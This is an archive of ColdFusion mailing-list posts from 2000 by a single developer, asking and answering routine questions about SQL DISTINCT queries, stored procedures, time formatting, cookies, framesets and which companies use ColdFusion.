>This is a much better benchmark for you to judge Cold Fusion on.

With a site I developed for Lucent, I had 233,000+ unique users in a 24 hr 
period.

CF had no problems.

Tim Bahlke
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



RE: Big companies using CF

2000-12-06 Thread Tim Bahlke

brilliantpeople.com the online job site for Management Recruiters 
International uses CF.  They also use CF for their intranet.  It's an 
extremely large site.
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



Re: Big companies using CF

2000-12-06 Thread Tim Bahlke

Krispy Kreme uses CF for their extranet.

Tim
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



Re: Big companies using CF

2000-12-05 Thread Tim Bahlke

I had Advanced CF training with Dave acouple months ago and there were some 
DoD people in there.

Tim
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



Re: Big companies using CF

2000-12-05 Thread Tim Bahlke

I'm a developer with Lucent and we use CF extensively behind the firewall.

In particular, I am using CF to create a monthly e-zine and a multimedia 
app.


>At 07:18 PM 12/04/00 -0700, Joe Sheble aka Wizaerd you wrote:
>
> >I know this is probably one of those discussions that turn up all the 
>time
> >on a mailing list such as this, and I apologize for bringing it up.  I 
>have
> >a new IT Director starting at my company in the very near future who's a 
>big
> >Microsoft fan, and thinks there's nothing better than ASP and/or C# 
>(which I
> >believe hasn't even been released yet, no?).
> >
> >When I told him that CF has been around for a long time, and some really 
>big
> >companies use it, he doubted it.  I told him Amazon.com was using it (was 
>I
> >right about this?).
> >
> >So anyway, I've agreed to compile a list of some of the bigger well known
> >internet comapnies using it, and would like some assistance.  What big 
>time
> >comapnies are using CF for their pages?
> >
> >thanx...
> >
> >Joseph E. Sheble
> >a.k.a. Wizaerd
> >Wizaerd's Realm
> >Canvas, 3D, Graphics,
> >ColdFusion, PHP, and mySQL
> >http://www.wizaerd.com
> >=
> >
> >
> >
>
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



Time from DB

2000-12-01 Thread Tim Bahlke

I am receiving the time from my database as 14:00:00.  How do I convert this 
to 2:00:00.

I'm guessing there's got to be a function that does this but I can't seem to 
found it.

Thanks,
Tim Bahlke
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



OT: JS Script Permissions

2000-11-17 Thread Tim Bahlke

I posted this on the JS list but did not get much of a response.  Thought I 
would pass it along to y'all ...

I have a situation where I need scripts in one frame to access, as well as 
modify, properties in another frame, like obtain the other frame's location, 
history ...

When I try to access these properties in IE I get an 'access is denied' 
error.  Upon further reading I have come to discover that due to security 
reasons scripts cannot access these properties in other frames.

With Netscape, I can use Netscape Object Signing to gain access to these 
properties while IE uses Authenticode.  I have found detailed documentation 
on exactly the steps necessary to sign scripts in NN but have found nothing 
regarding script signing in IE (plenty of white papers on technet about 
signing ActiveX components but this is JS).

If anyone has encountered this before or knows of resources where I can get 
more information I would greatly appreciate some advice.

Thanks,

Tim Bahlke
_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Share information about yourself, create your own public profile at 
http://profiles.msn.com.

~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists



SQL Query Question

2000-10-18 Thread Tim Bahlke

I have the following SP:

CREATE PROCEDURE [n_speaker_list] AS

SELECT DISTINCT s.f_name, s.l_name, s.pro_title, c.co_name, sm.subject, 
a.agenda_title, s.sp_file
FROM speakers s, company c, subject_matter sm, agenda a
WHERE a.time_slot = s.time_slot
AND s.subject_id = sm.subject_id
AND s.company_id = c.company_id
AND s.sp_file is not null
ORDER BY s.f_name, s.l_name

I want to pull all records where the s.f_name and s.l_name are distinct but not the 
rest of the string.

Can someone please enlighten me on how to do this?

Thanks,
Tim Bahlke



Tim Bahlke



Access your e-mail anywhere, at any time.
Get your FREE BellSouth Web Mail account today!
http://webmail.bellsouth.net


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: So, the Client isn't an issue to the CF Server?

2000-10-11 Thread Tim Bahlke

There is a MIME bug with IE5 on a Mac that prevents  from 
working.

I'm kinda surprised you got it working at all.

Tim Bahlke


At Wed, 11 Oct 2000 14:37:59 -0400, you wrote:
>
>
>
>All other includes on this site work.
>
>The one difference, which I failed to mention until just my last post ..
>this is the only include that includes a  tag that uploads a pic.
>
>However, as I said previously, the  as well as all other code in the
>includes on this set of includes works when all of the code is dumped onto a
>single page.  Everything executes beautifully on the Mac with IE if all of
>the code is on a single .cfm page.
>
>H.
>
>
>=
>Howard Owens
>Web Producer
>InsideVC.com
>mailto:[EMAIL PROTECTED]
>=
>
>> -Original Message-
>> From:Gavin Myers [SMTP:[EMAIL PROTECTED]]
>> Sent:Wednesday, October 11, 2000 11:35 AM
>> To:  CF-Talk
>> Subject: RE: So, the Client isn't an issue to the CF Server?
>> 
>> will any cfinclude work?
>> 
>> 
>> 
>--
>Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
>To Unsubscribe visit 
>http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
>message to [EMAIL PROTECTED] with 'unsubscribe' in the body.
>
>
>
Tim Bahlke



Access your e-mail anywhere, at any time.
Get your FREE BellSouth Web Mail account today!
http://webmail.bellsouth.net

--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



SP and Distinct [CF-Talk]

2000-09-20 Thread Tim Bahlke

I want to pull data from a db where the l_name fields are distinct.  I have 
created the SP below.  Obviously, I am not much of a SQL person.

The Distinct keyword in being applied for the whole select statement, which 
would be fine if not for 'a.time_slot'. Is there a way to limit the distinct 
just for l_name in the SP below?

SELECT DISTINCT s.f_name, s.l_name, s.pro_title, c.co_name, sm.subject, 
a.agenda_title, s.sp_file, a.time_slot
FROM speakers s, company c, subject_matter sm, agenda a
WHERE a.time_slot = s.time_slot
AND s.subject_id = sm.subject_id
AND s.company_id = c.company_id
AND s.sp_file is not null
ORDER BY s.f_name, s.l_name

Thanks,
Tim Bahlke


_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Share information about yourself, create your own public profile at 
http://profiles.msn.com.

--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



2 hours from now -

2000-09-13 Thread Tim Bahlke

I am trying to create a variable that represents two hours from now.  I have 
been playing with CreateTime() and TimeFormat() but can't seem to get what I 
want.

If it's 4:00 I was to return 6:00.

Any Suggestions?

Thanks,
Tim
_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Share information about yourself, create your own public profile at 
http://profiles.msn.com.

--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Re: Dynamic Framesets

2000-09-13 Thread Tim Bahlke

I just check to see what browser the user has and go from there.

For example ...





Hope this helps,
Tim


>From: "Jerry Tolentino" <[EMAIL PROTECTED]>
>Reply-To: [EMAIL PROTECTED]
>To: [EMAIL PROTECTED]
>Subject: Dynamic Framesets
>Date: Tue, 12 Sep 2000 15:50:06 -0400
>
>Is there a way to determine the dimensions of an HTML document.
>
>Reason: attempting to create a dynamic-sized frameset.
>
>
>--
>Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
>To Unsubscribe visit 
>http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or 
>send a message to [EMAIL PROTECTED] with 'unsubscribe' in 
>the body.

_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Share information about yourself, create your own public profile at 
http://profiles.msn.com.

--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



How many is too many

2000-09-12 Thread Tim Bahlke

Hey all,

>From a performance perspective, is there such a thing as too many s 
in a  statement?

If so, how many is too many and what are the alternatives?

Thanks,
Tim
_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Share information about yourself, create your own public profile at 
http://profiles.msn.com.

--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Re: Stored Procedures

2000-09-11 Thread Tim Bahlke

you need to declare your variable @theaddr varchar(48) before the 'AS' 
statement in your SP.

>From the snippet, it looks like you declared it after.

Tim


>From: Steve Weiner <[EMAIL PROTECTED]>
>Reply-To: [EMAIL PROTECTED]
>To: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
>Subject: Stored Procedures
>Date: Mon, 11 Sep 2000 13:14:20 -0400
>
>Can anyone give me a clue here?  I've just started working with SQL 7.0 and
>stored procedures.
>
>My stored procedure code is as follows:
>
>declare @theaddr varchar(48)
>select * from master where addr like '%@theaddr%'
>
>
>My cold fusion code is as follows:
>
>
> cfsqltype="CF_SQL_CHAR"
>  dbvarname="@testaddr"
>  value="#form.addr">
>   
>
>
>
>My error is as follows:
>
>ODBC Error Code = 37000 (Syntax error or access violation)
>
>
>[Microsoft][ODBC SQL Server Driver][SQL Server]Procedure test1 has no
>parameters and arguments were supplied.
>
>--
>Can anyone point me in what I am doing wrong?
>
>Thanks,
>[EMAIL PROTECTED]
>--
>Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
>To Unsubscribe visit 
>http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or 
>send a message to [EMAIL PROTECTED] with 'unsubscribe' in 
>the body.

_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Share information about yourself, create your own public profile at 
http://profiles.msn.com.

--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Scenario

2000-09-09 Thread Tim Bahlke

I would like to run a scenario past y'all ...

I'm developing a site for a conference.  The presentations are going to be 
streamed live on the net.  The presenters all have Power Point 
presentations.

I've created a page where on one side is the Window's Media Player and the 
other is a space for the PP presentations.  I was just initially going to 
create an applet that included all the slides in JPEG format and give the 
user the ability to manually go through the slides as the speaker talks.

Using this method, it is easy to see how the user might get off sync with 
the speaker.  I was thinking about maybe having someone in the presentation 
with a laptop pushing the slides to the user over the net.

As the speaker changes slides, the individual with the laptop would push a 
button and send a command to the web server to update the slide with the 
current one.  We will have all slides before hand in JPEG format.

What do y'all think about this?  If anyone has done this before I would love 
to hear from you, or anyone else for that matter who might have some 
thoughts on this.

Thanks for your input,

Tim Bahlke
_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Share information about yourself, create your own public profile at 
http://profiles.msn.com.

--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



cf 4.0 & Win2K

2000-09-08 Thread Tim Bahlke

I am guessing that CF4.0 Enterprise cannot run on Win2K.

Is this correct?

Thanks,
Tim Bahlke
_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Share information about yourself, create your own public profile at 
http://profiles.msn.com.

--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: next row in

2000-09-05 Thread Tim Bahlke

Thanks for the help ... I was all around it but just couldn't put it 
together.

Tim
_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Share information about yourself, create your own public profile at 
http://profiles.msn.com.

--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



next row in

2000-09-05 Thread Tim Bahlke

Hey all,

I am looping through a query and need to get data from the next row.

Make sense?  While my loop in handling row 5, I need to grab some data from 
row 6 and do a TimeFormat.  I just can't seem to get to that next row.

I have tried a number of different ways to do this but have had no luck.  It 
seems that this screams for an embedded loop but I just can't seem to get 
what I want.

If this makes any sense I anyone out there, I would be grateful for any 
assistance.

Thanks,
Tim
_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Share information about yourself, create your own public profile at 
http://profiles.msn.com.

--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Re: Netscape and IE difference

2000-09-01 Thread Tim Bahlke

marginwidth="0", marginheight="0" (for NN) in addition to what you have.

Since the browser can't read the other browser's code this works


>From: Mike Deane <[EMAIL PROTECTED]>
>Reply-To: [EMAIL PROTECTED]
>To: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
>Subject: Netscape and IE difference
>Date: Fri, 1 Sep 2000 10:09:56 -0400
>
>
>
>
>
>I use the above code to eliminate the default border/margin.  It only
>works correctly in IE.  Any suggestions?
>
>Thank you.
>/mdeane
>--
>Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
>To Unsubscribe visit 
>http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or 
>send a message to [EMAIL PROTECTED] with 'unsubscribe' in 
>the body.

_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Share information about yourself, create your own public profile at 
http://profiles.msn.com.

--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



width

2000-09-01 Thread Tim Bahlke

Hey all,

Is there a way to increase the width of the grid to show all columns 
returned?  I want to print out all the data in a table.

Is this the best way to do this?

Thanks,
Tim
_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Share information about yourself, create your own public profile at 
http://profiles.msn.com.

--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



SQL Server Connection Problem

2000-08-30 Thread Tim Bahlke

Hey all,

I am having a problem with a SQL Server connection.  In CF administrator, I 
am able to verify connection to the server.  However, when I try to query 
the db I get an error message telling me that the object name (which is the 
table) does not exist.

When I go to look at the db through CF Studio I can see the db but no tables 
that I created.

I'm guessing this is a permissions problem.  Can someone please help me out 
on this?  I am running Win200 Pro, SQL 7.0 Desktop Edition, and CF 4.5.

Thanks,

Tim
_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Share information about yourself, create your own public profile at 
http://profiles.msn.com.

--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Re: time conversion custom tag

2000-08-29 Thread Tim Bahlke

There are going to be about 6 international locations that I need to convert 
the time from EST to their local time.

I was hoping there was a custom tag that would, based on user input, convert 
the time for me.

Tim


>From: "Gregory Harris" <[EMAIL PROTECTED]>
>Reply-To: [EMAIL PROTECTED]
>To: <[EMAIL PROTECTED]>
>Subject: Re: time conversion custom tag
>Date: Tue, 29 Aug 2000 08:20:48 -0700
>
>Unless you know where they are coming from for sure, this would be 
>difficult to automatically tell what time zone they are in.  Maybe you 
>could try a DNS lookup, and use the country suffix, but that is unreliable 
>at best.  If you know for sure, I can't imagine setting the time to be that 
>hard, just a matter of using the DateAdd() function.
>
>Gregory Harris
>Los Angeles Information Technology Agency (ITA)
>[EMAIL PROTECTED]

_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Share information about yourself, create your own public profile at 
http://profiles.msn.com.

--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



time conversion custom tag

2000-08-29 Thread Tim Bahlke

Hey all,

Does anyone know of whether or not a custom tag exist that will convert a 
time from say EST to other time zones, not limited to US?

I need to convert a time from EST to the user's local time whether they are 
accessing from Korea, China, India, ...

Thanks,

Tim Bahlke
_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Share information about yourself, create your own public profile at 
http://profiles.msn.com.

--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



CF and WebTrends

2000-08-28 Thread Tim Bahlke

Is there any problem with using WebTrends on a CF site?  Can I track users 
actions through a CF site like I can with a *normal* html site?

Thanks,

Tim Bahlke
_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Share information about yourself, create your own public profile at 
http://profiles.msn.com.

--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



Cookies

2000-08-24 Thread Tim Bahlke

Hey all, I have a cookie question ...

I was reading an article on Allaire's site, Cookie Considerations and
Limitations, article 165, and it mentions that there is a maximum of 20
cookies per domain.
This surely can't be a *total* can it?  Does this mean that there can only
be 20 cookies set at any one time?

Can someone clear this up for me ...

Thanks

--------
Tim Bahlke, CIFO
Graphica
p. 230-0570
f. 230-0083



--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: SkillBuilding with ColdFusion

2000-08-24 Thread Tim Bahlke

That's how I got my start with CF.  Good resource if your just starting out.

Covers the basic pretty well.

----
Tim Bahlke, CIFO
Graphica
p. 230-0570
f. 230-0083

-Original Message-
From: Claremont, Timothy S [mailto:[EMAIL PROTECTED]]
Sent: Thursday, August 24, 2000 10:55 AM
To: '[EMAIL PROTECTED]'
Subject: SkillBuilding with ColdFusion


Has anyone had any experience with the interactive training CD that is
available from Allaire called "SkillBuilding with ColdFusion"?

I am about ready to order it, but want some feedback on the product before I
commit.


Tim Claremont
Xerox Corporation



--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.


--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: (OT)SQL Operator <>

2000-08-22 Thread Tim Bahlke

Thanks Andy and Jeremy.


Tim Bahlke, CIFO
Graphica
p. 230-0570
f. 230-0083




--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



(OT)SQL Operator <>

2000-08-22 Thread Tim Bahlke

Hey all ...

I have been going through the SQL 7 CBT and just finished operators.  With
regards to comparison operators ... != 'is not equal to', and <> 'is not
equal too'.

I do not understand <> 'not equal too'.

Can someone please explain this to me in more detail and possible provide an
example?

Thanks


Tim Bahlke, CIFO
Graphica
p. 230-0570
f. 230-0083



--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: Coldfusion Training..

2000-08-07 Thread Tim Bahlke

I started with the Skill Building CBT and then after 6 months and a few
projects went to advanced training.  This approach worked for me.  I was
able to get the basics on my own time and fairly inexpensively.

The in-class time was invaluable though.  I wanted to take the class-time in
advanced training instead of Fast Track.  Sitting with Dave for three days
and getting his take on things was awesome!!


Tim Bahlke, CIFO
thinkcreate.com
p. 336.230.0575
f. 336.230.0083

-Original Message-
From: Angél Stewart [mailto:[EMAIL PROTECTED]]
Sent: Monday, August 07, 2000 3:25 PM
To: [EMAIL PROTECTED]
Subject: Coldfusion Training..

A company that we just did a CF solution for, wants CF training, from
Beginner- Intermediate.

Do any of you know of any resources that we can send them to if we don't
wish to do this ourselves?

And if we do decide to do this ourselves, are there training materials
available from Allaire or elsewhere for this?

-Gel



--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.


--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: Studio tips

2000-08-03 Thread Tim Bahlke

I like the JavaScript shortcut ...

Type 'scriptj' (no quotes) and then CTRL+j

I also set one up for stylesheets.

--------
Tim Bahlke, CIFO
thinkcreate.com
p. 336.230.0575
f. 336.230.0083

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Thursday, August 03, 2000 11:34 AM
To: [EMAIL PROTECTED]
Subject: Re: Studio tips

In a message dated 08/02/2000 9:31:52 PM Eastern Daylight Time,
[EMAIL PROTECTED] writes:

<< We are giving a small presentation at the Ottawa ColdFusion User Group
 Meeting this Tuesday and I am looking for anything you can send.

 Things like keyboard shortcuts, things people do to make coding a little
 easier.  Some tricks that people who use Studio to code every once in a
 while might not know. >>

There are only a few I use often.  But maybe they will help (or maybe
someone
else has already covered them)

Other than Ctrl + W to close a file and Ctrl + S to save it, I use Ctrl + F
to run Code Sweep.  Of course, you have to have the correct Sweep designated
as the default for the type of code sweep you need for the file you have
open.  Our old Webmaster was a stickler for Code Sweep.  And she had a
point.
 It kept everyone not only neat, but also similarly laid out...

:-)
Oriole

--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.


--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: Filling up: Ecommerce Development with ColdFusion Seminar

2000-08-02 Thread Tim Bahlke

OPPS  Sorry!!

-Original Message-
From: Tim Bahlke [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, August 02, 2000 10:21 AM
To: [EMAIL PROTECTED]
Subject: RE: Filling up: Ecommerce Development with ColdFusion Seminar

Hey ... how do I get the 'Special Price Pass'???

--------
Tim Bahlke, CIFO
thinkcreate.com
p. 336.230.0575
f. 336.230.0083





--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.


--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: Filling up: Ecommerce Development with ColdFusion Seminar

2000-08-02 Thread Tim Bahlke

Hey ... how do I get the 'Special Price Pass'???

--------
Tim Bahlke, CIFO
thinkcreate.com
p. 336.230.0575
f. 336.230.0083




--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: Insert date and time into database

2000-07-31 Thread Tim Bahlke

If table_id is an integer, take away the quotes ...



update hitclear
where table_id = reeldemand
set cleardate = '#now#'


Also, I'm not sure if you can use now as the variable name is your CFSET
statement.  If you can't, I'm sure someone on this list will speak up.

----
Tim Bahlke, CIFO
thinkcreate.com
p. 336.230.0575
f. 336.230.0083

-Original Message-
From: Jacob [mailto:[EMAIL PROTECTED]]
Sent: Monday, July 31, 2000 2:34 PM
To: [EMAIL PROTECTED]
Subject: Insert date and time into database

I want to insert the date and time into a sql database. Here is want I am
trying to do:



update hitclear
where table_id = 'reeldemand'
set cleardate = '#now#'


But, I get the following error:

Error Diagnostic Information
ODBC Error Code = 37000 (Syntax error or access violation)
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the
keyword 'where'.
SQL = "update hitclear where table_id = 'reeldemand' set cleardate = '{ts
'2000-07-31 11:12:22'}'"
Data Source = "hits"
SQL = "update hitclear where table_id = 'reeldemand' set cleardate = '{ts
'2000-07-31 11:12:22'}'"
The error occurred while processing an element with a general identifier of
(CFQUERY), occupying document position (7:1) to (7:44) in the template file
D:\html\counter.htm
The specific sequence of files included or processed is:
D:\HTML\COUNTER.HTM .
Date/Time: 07/31/00 11:12:22

I did have it working, but it was almost 8 lines of coding to set the date
and time.  I Would like to shorten the code to speed up the template.

Any suggestions?

Thanks
Jacob


--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.


--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: Job Titles

2000-07-27 Thread Tim Bahlke

How about 'Pixel Overseer'

--------
Tim Bahlke, CIFO
thinkcreate.com
p. 336.230.0575
f. 336.230.0083




--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.



RE: [Semi-OT] Win NT error codes

2000-07-26 Thread Tim Bahlke

I think you can go to the command line and type 'net helpmsg [errornumber]'
in NT.

--------
Tim Bahlke, CIFO
thinkcreate.com
p. 336.230.0575
f. 336.230.0083

-Original Message-
From: Greg Creedon [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, July 26, 2000 2:38 PM
To: CF-Talk
Subject: [Semi-OT] Win NT error codes

I was looking through my CF 4.5.1 server log files and saw the following
entries:

"Error","TID=131","07/26/00","14:25:09","Unable to write reply -- client
browser stopped waiting for request. "
"Error","TID=131","07/26/00","14:25:09","Windows NT error number 109
occurred."

"Error","TID=131","07/26/00","14:24:05","Error number 232 occurred
attempting to close connection to web server."
"Error","TID=131","07/26/00","14:24:05","Windows NT error number 232
occurred."

Of course, the Microsoft site is so disorganized and tough to use - I
couldn't find a good list of NT errors. Any pointers/clues/explanations for
the above??

Thanks!

Greg Creedon
bla-bla


--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or
send a message to [EMAIL PROTECTED] with 'unsubscribe' in
the body.


--
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
